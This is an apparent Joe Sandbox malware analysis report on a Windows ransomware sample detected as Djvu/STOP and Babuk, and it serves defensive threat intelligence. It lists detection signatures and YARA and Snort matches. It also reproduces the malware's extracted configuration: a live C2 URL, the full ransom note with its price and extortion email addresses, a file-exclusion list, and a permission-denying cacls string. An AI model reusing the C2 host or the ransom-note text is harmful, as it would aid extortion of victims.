Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe

Overview

General Information

Sample name:3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
Analysis ID:1375050
MD5:de93e8a0692db2c2f178270b8da7b5d7
SHA1:21df7a70852c9d47b3423d14005bf67a69e6fdcc
SHA256:1ca8ad78274a829697b8381e96b914fea1a65b5b2351f536325d2143d689426e
Tags:exe
Infos:

Detection

Babuk, Djvu
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Found ransom note / readme
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Yara detected Babuk Ransomware
Yara detected Djvu Ransomware
C2 URLs / IPs found in malware configuration
Found stalling execution ending in API Sleep call
Infects executable files (exe, dll, sys, html)
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Writes a notice file (html or txt) to demand a ransom
Writes many files with high entropy
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
BabukBabuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and a 32bit old PE executable were observed over time. as well It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.babuk
NameDescriptionAttributionBlogpost URLsLink
STOP, DjvuSTOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stop

Malware Configuration

Threatname: Djvu

{"Download URLs": [""], "C2 url": "http://zexeq.com/test2/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-eyUsqpKbFl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0816JOsie", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv4l59cnPvyHS7MUq7f+l\\\\nmWik31Q0OnzfKZM8KMJoY+yyFL+S3uDL9PaQxc48MHJcxf+pQ9kwlIqCFp1AISoc\\\\nD8u0WRuNJXpbI822Tk6jY+ocBe38ntpgWsHzMuugGSR4rZz+f4g+rHjhSl73yfWg\\\\nXo8WM6KaBF3hVQKXnqxrSbpyp3STRnNyXF1xEG0q5H8GtE1HVPewj6w73sukHLq7\\\\nnaIJZ131m+quVE3\\/X8KAKbccAihBy8WqIpWFKVObrdaRt9NE\\/0ucb4JC0vpMN43+\\\\nrbV7gx2ad6OZz+phEqMUN8t5js9kHY3mwuM621LU9xjOYs15\\/uBs1woTYINVPXC7\\\\nHwIDAQAB\\\\n-----END PUBLIC KEY-----"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
    3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeWindows_Ransomware_Stop_1e8d48ffunknownunknown
    • 0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
    • 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
    3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeMALWARE_Win_STOPDetects STOP ransomwareditekSHen
    • 0xfe888:$x1: C:\SystemID\PersonalID.txt
    • 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC)
    • 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\
    • 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\
    • 0xfecec:$s1: " --AutoStart
    • 0xfed00:$s1: " --AutoStart
    • 0x102948:$s2: --ForNetRes
    • 0x102910:$s3: --Admin
    • 0x102d90:$s4: %username%
    • 0x102eb4:$s5: ?pid=
    • 0x102ec0:$s6: &first=true
    • 0x102ed8:$s6: &first=false
    • 0xfedf4:$s7: delself.bat
    • 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
    • 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
    • 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
      C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeWindows_Ransomware_Stop_1e8d48ffunknownunknown
      • 0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
      • 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
      C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeMALWARE_Win_STOPDetects STOP ransomwareditekSHen
      • 0xfe888:$x1: C:\SystemID\PersonalID.txt
      • 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC)
      • 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\
      • 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\
      • 0xfecec:$s1: " --AutoStart
      • 0xfed00:$s1: " --AutoStart
      • 0x102948:$s2: --ForNetRes
      • 0x102910:$s3: --Admin
      • 0x102d90:$s4: %username%
      • 0x102eb4:$s5: ?pid=
      • 0x102ec0:$s6: &first=true
      • 0x102ed8:$s6: &first=false
      • 0xfedf4:$s7: delself.bat
      • 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
      • 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
      • 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
        00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpWindows_Ransomware_Stop_1e8d48ffunknownunknown
        • 0x39b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
        00000003.00000000.1671969796.0000000000E31000.00000020.00000001.01000000.00000007.sdmpWindows_Ransomware_Stop_1e8d48ffunknownunknown
        • 0xc9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
        00000002.00000000.1664627925.0000000000461000.00000020.00000001.01000000.00000003.sdmpWindows_Ransomware_Stop_1e8d48ffunknownunknown
        • 0xc9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
        00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
          Click to see the 39 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          3.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpackJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
            3.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpackWindows_Ransomware_Stop_1e8d48ffunknownunknown
            • 0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
            • 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
            3.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpackMALWARE_Win_STOPDetects STOP ransomwareditekSHen
            • 0xfe888:$x1: C:\SystemID\PersonalID.txt
            • 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC)
            • 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\
            • 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\
            • 0xfecec:$s1: " --AutoStart
            • 0xfed00:$s1: " --AutoStart
            • 0x102948:$s2: --ForNetRes
            • 0x102910:$s3: --Admin
            • 0x102d90:$s4: %username%
            • 0x102eb4:$s5: ?pid=
            • 0x102ec0:$s6: &first=true
            • 0x102ed8:$s6: &first=false
            • 0xfedf4:$s7: delself.bat
            • 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
            • 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
            • 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
            0.2.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.460000.0.unpackJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
              0.2.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.460000.0.unpackWindows_Ransomware_Stop_1e8d48ffunknownunknown
              • 0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
              • 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
              Click to see the 25 entries

              Sigma Signatures

              No Sigma rule has matched

              Snort Signatures

              Timestamp:192.168.2.4175.119.10.23149733802833438 01/16/24-00:41:03.506186
              SID:2833438
              Source Port:49733
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.4175.119.10.23149746802833438 01/16/24-00:41:20.984825
              SID:2833438
              Source Port:49746
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.4175.119.10.23149736802833438 01/16/24-00:41:09.184797
              SID:2833438
              Source Port:49736
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.4175.119.10.23149737802833438 01/16/24-00:41:15.342258
              SID:2833438
              Source Port:49737
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://zexeq.com/test2/get.php?pid=F8AFCDC4EAvira URL Cloud: Label: malware
              Source: http://zexeq.com/test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637Avira URL Cloud: Label: malware
              Source: http://zexeq.com/test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=trueAvira URL Cloud: Label: malware
              Source: http://zexeq.com/test2/get.phpAvira URL Cloud: Label: malware
              Source: http://zexeq.com/test2/get.phppAvira URL Cloud: Label: malware
              Found malware configuration
              Source: 0.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.460000.0.unpackMalware Configuration Extractor: Djvu {"Download URLs": [""], "C2 url": "http://zexeq.com/test2/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-eyUsqpKbFl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0816JOsie", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData
              Machine Learning detection for sample
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_00471178 CryptDestroyHash,CryptReleaseContext,0_2_00471178
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_0046E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,0_2_0046E870
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_0046EA51 CryptDestroyHash,CryptReleaseContext,0_2_0046EA51
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_0046EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,0_2_0046EAA0
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_0046EC68 CryptDestroyHash,CryptReleaseContext,0_2_0046EC68
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_00470FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,0_2_00470FC0
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 2_2_0046E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,2_2_0046E870
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 2_2_0046EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,2_2_0046EAA0
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 2_2_00470FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,2_2_00470FC0
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 2_2_00471178 CryptDestroyHash,CryptReleaseContext,2_2_00471178
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 2_2_0046EA51 CryptDestroyHash,CryptReleaseContext,2_2_0046EA51
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 2_2_0046EC68 CryptDestroyHash,CryptReleaseContext,2_2_0046EC68
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 3_2_00E3E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,3_2_00E3E870
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 3_2_00E3EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,3_2_00E3EAA0
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 3_2_00E40FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,3_2_00E40FC0
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 3_2_00E41178 CryptDestroyHash,CryptReleaseContext,3_2_00E41178
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 3_2_00E3EA51 CryptDestroyHash,CryptReleaseContext,3_2_00E3EA51
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 3_2_00E3EC68 CryptDestroyHash,CryptReleaseContext,3_2_00E3EC68
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E41178 CryptDestroyHash,CryptReleaseContext,4_2_00E41178
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E3E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,4_2_00E3E870
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E3EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,4_2_00E3EAA0
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E3EA51 CryptDestroyHash,CryptReleaseContext,4_2_00E3EA51
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E3EC68 CryptDestroyHash,CryptReleaseContext,4_2_00E3EC68
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E40FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,4_2_00E40FC0
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv4l59cnPvyHS7MUq7f+l\\nmWik31Q0OnzfKZM8KMJoY+yyFL+S3uDL9P2_2_00479F90
